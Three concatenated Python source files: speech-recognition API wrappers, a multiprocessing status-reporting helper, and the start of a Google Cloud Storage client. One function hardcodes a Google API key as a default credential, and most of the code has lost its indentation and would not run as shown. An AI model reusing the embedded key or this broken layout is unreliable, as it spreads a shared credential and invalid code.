buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
phrase_count += 1
# check if speaking has stopped for longer than the pause threshold on the audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# check how long the detected phrase is, and retry listening if the phrase is too short
phrase_count -= pause_count
if phrase_count >= phrase_buffer_count: break # phrase is long enough, stop listening
# obtain frame data
for i in range(pause_count - non_speaking_buffer_count): frames.pop() # remove extra non-speaking frames at the end
frame_data = b"".join(list(frames))
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def listen_in_background(self, source, callback):
"""
        Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase is detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that ``callback`` function will be called from a non-main thread.
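        A minimal sketch (``r`` is a ``Recognizer``; the callback only prints a marker)::

            def on_phrase(recognizer, audio):
                print("phrase captured")  # runs on the background listener thread

            stop_listening = r.listen_in_background(sr.Microphone(), on_phrase)
            # ... do other work here ...
            stop_listening()  # ask the background thread to stop and wait for it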
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except WaitTimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
def recognize_sphinx(self, audio_data, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using CMU Sphinx.
        The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` or ``"en-GB"``, defaulting to US English. Out of the box, only ``en-US`` is supported. See `Notes on using PocketSphinx <https://github.com/Uberi/speech_recognition/blob/master/reference/pocketsphinx.rst>`__ for information about installing other languages. This document is also included under ``reference/pocketsphinx.rst``.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the Sphinx ``pocketsphinx.pocketsphinx.Decoder`` object resulting from the recognition.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if there are any issues with the Sphinx installation.
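        A minimal sketch (``r`` is a ``Recognizer``, ``audio`` is an ``AudioData`` instance; requires a working PocketSphinx installation)::

            try:
                print(r.recognize_sphinx(audio))
            except sr.UnknownValueError:
                print("Sphinx could not understand the audio")
            except sr.RequestError as e:
                print("Sphinx error: {0}".format(e))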
"""
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert isinstance(language, str), "`language` must be a string"
# import the PocketSphinx speech recognition module
try:
from pocketsphinx import pocketsphinx
from sphinxbase import sphinxbase
except ImportError:
raise RequestError("missing PocketSphinx module: ensure that PocketSphinx is set up correctly.")
except ValueError:
raise RequestError("bad PocketSphinx installation detected; make sure you have PocketSphinx version 0.0.9 or better.")
language_directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pocketsphinx-data", language)
if not os.path.isdir(language_directory):
raise RequestError("missing PocketSphinx language data directory: \"{0}\"".format(language_directory))
acoustic_parameters_directory = os.path.join(language_directory, "acoustic-model")
if not os.path.isdir(acoustic_parameters_directory):
raise RequestError("missing PocketSphinx language model parameters directory: \"{0}\"".format(acoustic_parameters_directory))
language_model_file = os.path.join(language_directory, "language-model.lm.bin")
if not os.path.isfile(language_model_file):
raise RequestError("missing PocketSphinx language model file: \"{0}\"".format(language_model_file))
phoneme_dictionary_file = os.path.join(language_directory, "pronounciation-dictionary.dict")
if not os.path.isfile(phoneme_dictionary_file):
raise RequestError("missing PocketSphinx phoneme dictionary file: \"{0}\"".format(phoneme_dictionary_file))
# create decoder object
config = pocketsphinx.Decoder.default_config()
config.set_string("-hmm", acoustic_parameters_directory) # set the path of the hidden Markov model (HMM) parameter files
config.set_string("-lm", language_model_file)
config.set_string("-dict", phoneme_dictionary_file)
config.set_string("-logfn", os.devnull) # disable logging (logging causes unwanted output in terminal)
decoder = pocketsphinx.Decoder(config)
# obtain audio data
raw_data = audio_data.get_raw_data(convert_rate = 16000, convert_width = 2) # the included language models require audio to be 16-bit mono 16 kHz in little-endian format
# obtain recognition results
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
if show_all: return decoder
# return results
hypothesis = decoder.hyp()
if hypothesis is not None: return hypothesis.hypstr
raise UnknownValueError() # no transcriptions available
def recognize_google(self, audio_data, key = None, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
        To obtain your own API key, simply follow the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
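        A minimal sketch (``r`` is a ``Recognizer``, ``audio`` is an ``AudioData`` instance; the default key requires an internet connection)::

            try:
                print(r.recognize_google(audio))
            except sr.UnknownValueError:
                print("Google Speech Recognition could not understand the audio")
            except sr.RequestError as e:
                print("recognition request failed: {0}".format(e))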
"""
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert key is None or isinstance(key, str), "`key` must be `None` or a string"
assert isinstance(language, str), "`language` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate = None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples must be 16-bit
)
if key is None: key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"
url = "http://www.google.com/speech-api/v2/recognize?{0}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
request = Request(url, data = flac_data, headers = {"Content-Type": "audio/x-flac; rate={0}".format(audio_data.sample_rate)})
# obtain audio transcription results
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if "alternative" not in actual_result: raise UnknownValueError()
for entry in actual_result["alternative"]:
if "transcript" in entry:
return entry["transcript"]
raise UnknownValueError() # no transcriptions available
def recognize_wit(self, audio_data, key, show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Wit.ai API.
The Wit.ai API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://wit.ai/>`__ and creating an app. You will need to add at least one intent to the app before you can see the API key, though the actual intent settings don't matter.
To get the API key for a Wit.ai app, go to the app's overview page, go to the section titled "Make an API request", and look for something along the lines of ``Authorization: Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX``; ``XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`` is the API key. Wit.ai API keys are 32-character uppercase alphanumeric strings.
The recognition language is configured in the Wit.ai app settings.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://wit.ai/docs/http/20141022#get-intent-via-text-link>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate = None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://api.wit.ai/speech?v=20141022"
request = Request(url, data = wav_data, headers = {"Authorization": "Bearer {0}".format(key), "Content-Type": "audio/wav"})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "_text" not in result or result["_text"] is None: raise UnknownValueError()
return result["_text"]
def recognize_bing(self, audio_data, key, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-4-supported-locales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
assert isinstance(language, str), "`language` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://oxford-speech.cloudapp.net/token/issueToken"
credential_request = Request(credential_url, data = urlencode({
"grant_type": "client_credentials",
"client_id": "python",
"client_secret": key,
"scope": "https://speech.platform.bing.com"
}).encode("utf-8"))
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
credential_text = credential_response.read().decode("utf-8")
credentials = json.loads(credential_text)
access_token, expiry_seconds = credentials["access_token"], float(credentials["expires_in"])
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + expiry_seconds
wav_data = audio_data.get_wav_data(
convert_rate = 16000, # audio samples must be 8kHz or 16 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{0}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data = wav_data, headers = {
"Authorization": "Bearer {0}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={0}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_api(self, audio_data, client_access_token, language = "en", session_id = None, show_all = False):
"""
Perform speech recognition on ``audio_data`` (an ``AudioData`` instance), using the api.ai Speech to Text API.
The api.ai API client access token is specified by ``client_access_token``. Unfortunately, this is not available without `signing up for an account <https://console.api.ai/api-client/#/signup>`__ and creating an api.ai agent. To get the API client access token, go to the agent settings, go to the section titled "API keys", and look for "Client access token". API client access tokens are 32-character lowercase hexadecimal strings.
Although the recognition language is specified when creating the api.ai agent in the web console, it must also be provided in the ``language`` parameter as an RFC5646 language tag like ``"en"`` (US English) or ``"fr"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://api.ai/docs/reference/#languages>`__.
The ``session_id`` is an optional string of up to 36 characters used to identify the client making the requests; api.ai can make use of previous requests that used the same session ID to give more accurate results for future requests. If ``None``, sessions are not used; every query is interpreted as if it is the first one.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://api.ai/docs/reference/#a-namepost-multipost-query-multipart>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
        assert isinstance(client_access_token, str), "`client_access_token` must be a string"
assert isinstance(language, str), "`language` must be a string"
assert session_id is None or (isinstance(session_id, str) and len(session_id) <= 36), "`session_id` must be a string of up to 36 characters"
wav_data = audio_data.get_wav_data(convert_rate = 16000, convert_width = 2) # audio must be 16-bit mono 16 kHz
url = "https://api.api.ai/v1/query"
# pick a good multipart boundary; one that is guaranteed not to be in the text
while True:
boundary = uuid.uuid4().hex # generate a random boundary
if boundary.encode("utf-8") not in wav_data:
break
if session_id is None: session_id = uuid.uuid4().hex
data = (
b"--" + boundary.encode("utf-8") + b"\r\n" +
b"Content-Disposition: form-data; name=\"request\"\r\n" +
b"Content-Type: application/json\r\n" +
b"\r\n" +
b"{\"v\": \"20150910\", \"sessionId\": \"" + session_id.encode("utf-8") + b"\", \"lang\": \"" + language.encode("utf-8") + b"\"}\r\n" +
b"--" + boundary.encode("utf-8") + b"\r\n" +
b"Content-Disposition: form-data; name=\"voiceData\"; filename=\"audio.wav\"\r\n" +
b"Content-Type: audio/wav\r\n" +
b"\r\n" +
wav_data + b"\r\n" +
b"--" + boundary.encode("utf-8") + b"--\r\n"
)
request = Request(url, data = data, headers = {
"Authorization": "Bearer {0}".format(client_access_token),
"Content-Length": str(len(data)),
"Expect": "100-continue",
"Content-Type": "multipart/form-data; boundary={0}".format(boundary)
})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "asr" not in result or result["asr"] is None:
raise UnknownValueError()
return result["result"]["resolvedQuery"]
def recognize_ibm(self, audio_data, username, password, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the IBM Speech to Text API.
The IBM Speech to Text username and password are specified by ``username`` and ``password``, respectively. Unfortunately, these are not available without `signing up for an account <https://console.ng.bluemix.net/registration/>`__. Once logged into the Bluemix console, follow the instructions for `creating an IBM Watson service instance <http://www.ibm.com/smarterplanet/us/en/ibmwatson/developercloud/doc/getting_started/gs-credentials.shtml>`__, where the Watson service is "Speech To Text". IBM Speech to Text usernames are strings of the form XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX, while passwords are mixed-case alphanumeric strings.
The recognition language is determined by ``language``, an RFC5646 language tag with a dialect like ``"en-US"`` (US English) or ``"zh-CN"`` (Mandarin Chinese), defaulting to US English. The supported language values are listed under the ``model`` parameter of the `audio recognition API documentation <http://www.ibm.com/smarterplanet/us/en/ibmwatson/developercloud/speech-to-text/api/v1/#recognize_audio_sessionless12>`__, in the form ``LANGUAGE_BroadbandModel``, where ``LANGUAGE`` is the language value.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <http://www.ibm.com/smarterplanet/us/en/ibmwatson/developercloud/speech-to-text/api/v1/#recognize_audio_sessionless12>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(username, str), "`username` must be a string"
assert isinstance(password, str), "`password` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate = None if audio_data.sample_rate >= 16000 else 16000, # audio samples should be at least 16 kHz
convert_width = None if audio_data.sample_width >= 2 else 2 # audio samples should be at least 16-bit
)
model = "{0}_BroadbandModel".format(language)
url = "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize?{0}".format(urlencode({
"profanity_filter": "false",
"continuous": "true",
"model": model,
}))
request = Request(url, data = flac_data, headers = {"Content-Type": "audio/x-flac"})
if hasattr("", "encode"):
authorization_value = base64.standard_b64encode("{0}:{1}".format(username, password).encode("utf-8")).decode("utf-8")
else:
authorization_value = base64.standard_b64encode("{0}:{1}".format(username, password))
request.add_header("Authorization", "Basic {0}".format(authorization_value))
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "results" not in result or len(result["results"]) < 1 or "alternatives" not in result["results"][0]:
raise UnknownValueError()
transcription = []
for utterance in result["results"]:
if "alternatives" not in utterance: raise UnknownValueError()
for hypothesis in utterance["alternatives"]:
if "transcript" in hypothesis:
transcription.append(hypothesis["transcript"])
return "\n".join(transcription)
def get_flac_converter():
# determine which converter executable to use
system = platform.system()
path = os.path.dirname(os.path.abspath(__file__)) # directory of the current module file, where all the FLAC bundled binaries are stored
flac_converter = shutil_which("flac") # check for installed version first
if flac_converter is None: # flac utility is not installed
compatible_machine_types = ["i686", "i786", "x86", "x86_64", "AMD64"] # whitelist of machine types our bundled binaries are compatible with
if system == "Windows" and platform.machine() in compatible_machine_types:
flac_converter = os.path.join(path, "flac-win32.exe")
elif system == "Linux" and platform.machine() in compatible_machine_types:
flac_converter = os.path.join(path, "flac-linux-x86")
elif system == "Darwin" and platform.machine() in compatible_machine_types:
flac_converter = os.path.join(path, "flac-mac")
else:
raise OSError("FLAC conversion utility not available - consider installing the FLAC command line application using `brew install flac` or your operating system's equivalent")
# mark FLAC converter as executable if possible
try:
stat_info = os.stat(flac_converter)
os.chmod(flac_converter, stat_info.st_mode | stat.S_IEXEC)
except OSError: pass
return flac_converter
def shutil_which(pgm):
"""Python 2 backport of ``shutil.which()`` from Python 3"""
path = os.getenv('PATH')
for p in path.split(os.path.pathsep):
p = os.path.join(p, pgm)
if os.path.exists(p) and os.access(p, os.X_OK):
return p
# backwards compatibility shims
WavFile = AudioFile # WavFile was renamed to AudioFile in 3.4.1
def recognize_att(self, audio_data, app_key, app_secret, language = "en-US", show_all = False):
authorization_url = "https://api.att.com/oauth/v4/token"
authorization_body = "client_id={0}&client_secret={1}&grant_type=client_credentials&scope=SPEECH".format(app_key, app_secret)
try: authorization_response = urlopen(authorization_url, data = authorization_body.encode("utf-8"))
except HTTPError as e: raise RequestError("credential request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code))))
except URLError as e: raise RequestError("credential connection failed: {0}".format(e.reason))
authorization_text = authorization_response.read().decode("utf-8")
authorization_bearer = json.loads(authorization_text).get("access_token")
if authorization_bearer is None: raise RequestError("missing OAuth access token in requested credentials")
wav_data = audio_data.get_wav_data(convert_rate = 8000 if audio_data.sample_rate < 16000 else 16000, convert_width = 2)
request = Request("https://api.att.com/speech/v3/speechToText", data = wav_data, headers = {"Authorization": "Bearer {0}".format(authorization_bearer), "Content-Language": language, "Content-Type": "audio/wav"})
try: response = urlopen(request)
except HTTPError as e: raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code))))
except URLError as e: raise RequestError("recognition connection failed: {0}".format(e.reason))
result = json.loads(response.read().decode("utf-8"))
if show_all: return result
if "Recognition" not in result or "NBest" not in result["Recognition"]: raise UnknownValueError()
for entry in result["Recognition"]["NBest"]:
if entry.get("Grade") == "accept" and "ResultText" in entry: return entry["ResultText"]
raise UnknownValueError() # no transcriptions available
Recognizer.recognize_att = classmethod(recognize_att) # AT&T API is deprecated and shutting down as of 3.4.0
|
multiprocessing.py
|
#
# Copyright 2021 Johannes Hörmann
#
# ### MIT license
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""Multiprocessing utils."""
# NOTE: depending on platform, we may have to experiment with the forking methods,
# https://docs.python.org/3/library/multiprocessing.html#contexts-and-start-methods
import asyncio
import logging
import multiprocessing # run task as child process to avoid side effects
import queue
import traceback # forward exception from child process to parent process
logger = logging.getLogger(__name__)
# inspired by
# https://stackoverflow.com/questions/19924104/python-multiprocessing-handling-child-errors-in-parent
class Process(multiprocessing.Process):
"""
Class which returns child Exceptions to Parent.
https://stackoverflow.com/a/33599967/4992248
"""
def __init__(self, *args, **kwargs):
multiprocessing.Process.__init__(self, *args, **kwargs)
self._parent_conn, self._child_conn = multiprocessing.Pipe()
self._exception = None
def run(self):
try:
super().run()
self._child_conn.send(None)
except Exception as e:
tb = traceback.format_exc()
self._child_conn.send((e, tb))
            raise e  # You can still raise this exception if you need to
@property
def exception(self):
if self._parent_conn.poll():
self._exception = self._parent_conn.recv()
return self._exception
class StatusReportingChildProcessBuilder:
"""Outsource serial functions with status report handlers.
The status report handler is expected to conform to the
click.ProgressBar interface. In particular, it must exhibit an
update(val) method.
For any function that runs serial and reports status via such a callback,
this wrapper can run them in a non-blocking forked process and forward the
status reports via queue to the callback.
The function must have the signature
func(*args, status_report_callback=None)
"""
def __init__(self, target, status_report_callback):
self._target = target
self._status_report_handler = status_report_callback
async def __call__(self, *args):
"""Spawn child process to assure my environment stays untouched."""
return_value_queue = multiprocessing.Queue()
status_progress_queue = multiprocessing.Queue()
process = Process(target=self.target_wrapper, args=[return_value_queue, status_progress_queue, *args])
process.start()
# wait for child to queue its return value and
# check whether child raises exception
while return_value_queue.empty():
# if child raises exception, then it has terminated
# before queueing any return value
if process.exception:
error, p_traceback = process.exception
raise ChildProcessError(p_traceback)
try:
status_report = status_progress_queue.get_nowait()
except queue.Empty:
pass
else:
logger.debug(f"Parent process received status report {status_report}")
self._status_report_handler.update(status_report)
await asyncio.sleep(0.1)
return_value = return_value_queue.get()
        # a child that never raises an exception and never queues anything to
        # the return_value_queue would have deadlocked in the get() above
process.join()
return return_value
    def target_wrapper(self, return_value_queue, status_progress_queue, *args):
        # The handler only needs an update() method; update is deliberately
        # defined without 'self' so the class object itself can be handed to
        # the target function as the status report callback.
        class StatusReportClass:
def update(status_report):
logger.debug(f"Child process queues status report {status_report}")
status_progress_queue.put(status_report)
return_value_queue.put(self._target(*args, status_report_callback=StatusReportClass))
def test_function(steps, status_report_callback):
for n in range(steps):
print(f"Child process step {n}")
status_report_callback.update(n)
return True
class test_handler:
def update(n):
print(f"Test callback received report for step {n}")
async def test_run():
test_process = StatusReportingChildProcessBuilder(test_function, test_handler)
return_value = await test_process(10)
print(f"Child process returned {return_value}.")
|
gcsio.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Google Cloud Storage client.
This library evolved from the Google App Engine GCS client available at
https://github.com/GoogleCloudPlatform/appengine-gcs-client.
"""
import cStringIO
import errno
import fnmatch
import logging
import multiprocessing
import os
import Queue
import re
import threading
import time
import traceback
import httplib2
from apache_beam.utils import retry
__all__ = ['GcsIO']
# Issue a friendlier error message if the storage library is not available.
# TODO(silviuc): Remove this guard when storage is available everywhere.
try:
# pylint: disable=wrong-import-order, wrong-import-position
# pylint: disable=ungrouped-imports
import apitools.base.py.transfer as transfer
from apitools.base.py.batch import BatchApiRequest
from apitools.base.py.exceptions import HttpError
from apache_beam.internal.gcp import auth
from apache_beam.io.gcp.internal.clients import storage
except ImportError:
raise ImportError(
'Google Cloud Storage I/O not supported for this execution environment '
'(could not import storage API client).')
# This is the size of each partial-file read operation from GCS. This
# parameter was chosen to give good throughput while keeping memory usage at
# a reasonable level; the following table shows throughput reached when
# reading files of a given size with a chosen buffer size and informed the
# choice of the value, as of 11/2016:
#
# +---------------+------------+-------------+-------------+-------------+
# | | 50 MB file | 100 MB file | 200 MB file | 400 MB file |
# +---------------+------------+-------------+-------------+-------------+
# | 8 MB buffer | 17.12 MB/s | 22.67 MB/s | 23.81 MB/s | 26.05 MB/s |
# | 16 MB buffer | 24.21 MB/s | 42.70 MB/s | 42.89 MB/s | 46.92 MB/s |
# | 32 MB buffer | 28.53 MB/s | 48.08 MB/s | 54.30 MB/s | 54.65 MB/s |
# | 400 MB buffer | 34.72 MB/s | 71.13 MB/s | 79.13 MB/s | 85.39 MB/s |
# +---------------+------------+-------------+-------------+-------------+
DEFAULT_READ_BUFFER_SIZE = 16 * 1024 * 1024
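# Editor's illustration (assumption, not part of the original source): a caller
# that prefers the larger 32 MB buffer from the table above would pass it through
# open(), e.g.
#   GcsIO().open('gs://my-bucket/big-file', read_buffer_size=32 * 1024 * 1024)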
# This is the number of seconds the library will wait for GCS operations to
# complete.
DEFAULT_HTTP_TIMEOUT_SECONDS = 60
# This is the number of seconds the library will wait for a partial-file read
# operation from GCS to complete before retrying.
DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS = 60
# This is the size of chunks used when writing to GCS.
WRITE_CHUNK_SIZE = 8 * 1024 * 1024
# Maximum number of operations permitted in GcsIO.copy_batch() and
# GcsIO.delete_batch().
MAX_BATCH_OPERATION_SIZE = 100
def parse_gcs_path(gcs_path):
"""Return the bucket and object names of the given gs:// path."""
match = re.match('^gs://([^/]+)/(.+)$', gcs_path)
if match is None:
raise ValueError('GCS path must be in the form gs://<bucket>/<object>.')
return match.group(1), match.group(2)
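# Editor's illustration (not part of the original source): parse_gcs_path splits a
# gs:// URI into its bucket and object components and insists on a non-empty object
# name, e.g.
#   parse_gcs_path('gs://my-bucket/logs/2016/11/01.txt')
#     -> ('my-bucket', 'logs/2016/11/01.txt')
#   parse_gcs_path('gs://my-bucket')   # no object part -> raises ValueError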
class GcsIOError(IOError, retry.PermanentException):
"""GCS IO error that should not be retried."""
pass
class GcsIO(object):
"""Google Cloud Storage I/O client."""
def __new__(cls, storage_client=None):
if storage_client:
# This path is only used for testing.
return super(GcsIO, cls).__new__(cls)
else:
# Create a single storage client for each thread. We would like to avoid
# creating more than one storage client for each thread, since each
# initialization requires the relatively expensive step of initializing
      # credentials.
local_state = threading.local()
if getattr(local_state, 'gcsio_instance', None) is None:
credentials = auth.get_service_credentials()
storage_client = storage.StorageV1(
credentials=credentials,
